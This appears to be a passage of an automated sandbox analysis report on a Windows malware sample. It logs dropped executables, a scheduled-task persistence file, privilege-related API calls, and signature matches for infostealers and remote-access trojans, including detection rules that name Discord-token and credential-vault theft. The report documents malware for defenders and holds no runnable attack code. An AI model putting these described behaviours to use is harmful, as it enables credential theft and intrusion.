Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name:
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name: .idata
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D3D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00D3D5EB

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D31201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00D31201

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D3E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00D3E8F6

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	File created: C:\Windows\Tasks\skotes.job			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D42046	0_2_00D42046
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CD8060	0_2_00CD8060
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D38298	0_2_00D38298
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D0E4FF	0_2_00D0E4FF
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D0676B	0_2_00D0676B
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D64873	0_2_00D64873
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CDCAF0	0_2_00CDCAF0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CFCAA0	0_2_00CFCAA0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CECC39	0_2_00CECC39
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D06DD9	0_2_00D06DD9
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CD91C0	0_2_00CD91C0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CEB119	0_2_00CEB119
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF1394	0_2_00CF1394
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF1706	0_2_00CF1706
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF781B	0_2_00CF781B
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF19B0	0_2_00CF19B0
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CE997D	0_2_00CE997D
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CD7920	0_2_00CD7920
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF7A4A	0_2_00CF7A4A
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF7CA7	0_2_00CF7CA7
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF1C77	0_2_00CF1C77
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D09EEE	0_2_00D09EEE
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D5BE44	0_2_00D5BE44
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF1F32	0_2_00CF1F32
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Code function: 21_2_0554E9C8	21_2_0554E9C8

Source: C:\Users\user\Desktop\random.exe	Code function: String function: 00CD9CB3 appears 31 times
Source: C:\Users\user\Desktop\random.exe	Code function: String function: 00CEF9F2 appears 40 times
Source: C:\Users\user\Desktop\random.exe	Code function: String function: 00CF0A30 appears 46 times

Source: random.exe, 00000000.00000003.1425545322.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1424723156.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1419759519.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameITE vs random.exe
Source: random.exe, 00000000.00000003.1419759519.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1424106315.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1419924618.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameITE vs random.exe
Source: random.exe, 00000000.00000003.1419924618.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1425487551.0000000000E91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000002.1426344827.0000000000E96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000002.1427368203.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameITE vs random.exe
Source: random.exe, 00000000.00000002.1427368203.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs random.exe

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 54.2.48a23b3144.exe.3f09550.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 6d81c0d08d.exe PID: 1160, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: Section: rkvlnuwm ZLIB complexity 0.9944389773252232
Source: skotes.exe.11.dr	Static PE information: Section: rkvlnuwm ZLIB complexity 0.9944389773252232
Source: random[3].exe.18.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[3].exe.18.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 82ab3472d6.exe.18.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 82ab3472d6.exe.18.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[1].exe.18.dr	Static PE information: Section: tdgddxmh ZLIB complexity 0.9904858002983802
Source: b7668220f8.exe.18.dr	Static PE information: Section: tdgddxmh ZLIB complexity 0.9904858002983802
Source: random[1].exe0.18.dr	Static PE information: Section: ZLIB complexity 0.997046493902439
Source: random[1].exe0.18.dr	Static PE information: Section: sfyuxlav ZLIB complexity 0.994609421530673
Source: 6d81c0d08d.exe.18.dr	Static PE information: Section: ZLIB complexity 0.997046493902439
Source: 6d81c0d08d.exe.18.dr	Static PE information: Section: sfyuxlav ZLIB complexity 0.994609421530673
Source: random[1].exe1.18.dr	Static PE information: Section: ZLIB complexity 0.9983413461538462
Source: random[1].exe1.18.dr	Static PE information: Section: ntmjlkyf ZLIB complexity 0.9947286944739235
Source: 0a633717d1.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9983413461538462
Source: 0a633717d1.exe.18.dr	Static PE information: Section: ntmjlkyf ZLIB complexity 0.9947286944739235
Source: random[2].exe.18.dr	Static PE information: Section: ZLIB complexity 1.0003621295592706
Source: random[2].exe.18.dr	Static PE information: Section: cjilwkrm ZLIB complexity 0.9946810664411172
Source: 376bb929a5.exe.18.dr	Static PE information: Section: ZLIB complexity 1.0003621295592706
Source: 376bb929a5.exe.18.dr	Static PE information: Section: cjilwkrm ZLIB complexity 0.9946810664411172
Source: random[2].exe0.18.dr	Static PE information: Section: bchkvmmi ZLIB complexity 0.9946786184698724
Source: 327981c77b.exe.18.dr	Static PE information: Section: bchkvmmi ZLIB complexity 0.9946786184698724
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: Section: bchkvmmi ZLIB complexity 0.9946786184698724
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: Section: rkvlnuwm ZLIB complexity 0.9944389773252232
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: Section: rkvlnuwm ZLIB complexity 0.9944389773252232

Source: 6d81c0d08d.exe.18.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe0.18.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.18.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 327981c77b.exe.18.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: random[3].exe.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[3].exe.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 82ab3472d6.exe.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 82ab3472d6.exe.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[3].exe0.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[3].exe0.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 48a23b3144.exe.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 48a23b3144.exe.18.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'

Source: random[3].exe.18.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 82ab3472d6.exe.18.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: random[3].exe0.18.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 48a23b3144.exe.18.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@100/147@6/11

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D437B5 GetLastError,FormatMessageW,

0_2_00D437B5

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D310BF AdjustTokenPrivileges,CloseHandle,		0_2_00D310BF
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00D316C3

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00D451CD

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D5A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00D5A67C

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D4648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00D4648E

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00CD42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00CD42A2

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\m5569IMo3.hta

Jump to behavior

Source: random.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
